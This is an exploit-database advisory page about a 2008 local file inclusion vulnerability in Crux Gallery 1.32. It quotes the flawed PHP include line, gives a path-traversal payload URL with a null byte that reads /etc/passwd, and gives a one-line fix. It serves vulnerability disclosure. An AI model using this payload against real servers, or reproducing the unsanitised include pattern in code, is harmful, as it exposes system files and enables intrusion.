Crux Gallery - exploit.company

vendor:

Crux Gallery

by:

milw0rm.com

7.5

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Crux Gallery

Affected Version From: 1.32

Affected Version To: 1.32

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Crux Gallery <= 1.32 Local File Inclusion Vulnerability

Crux Gallery version 1.32 is vulnerable to Local File Inclusion. The vulnerability exists due to the lack of proper sanitization of user-supplied input to the 'theme' parameter in 'index.php' script. An attacker can exploit this vulnerability to include arbitrary files from the web server and execute arbitrary code on the vulnerable system.

Mitigation:

Declare the $theme variable in the 'index.php' script.

Source

Exploit-DB raw data:

 ~~+=========================================================+~~
 ~~+=========================================================+~~
  [?] Crux Gallery <= 1.32 Local File Inclusion Vulnerability
  [?] Discovered On: 01/10/2008
  [*] PHP.ini 
  [*] Magic_Quotes_Gpc = Off
 ~~+=========================================================+~~
  (index.php) // Greetz -> Osirys and darkjoker
  14. $m = $_GET['m'];
  15. $p = $_GET['p'];
  16. $dir = $_GET['dir'];
  17. require_once("main.php");
  18. require_once("themes/".$theme."/theme.php"); 
  $theme  isn't declared, so you can include any file.
  [*] http//[path]/index.php?theme=../../../../../etc/passwd%00
  [*] How To Fix: declare $theme
  ~~+=========================================================+~~

# milw0rm.com [2008-10-01]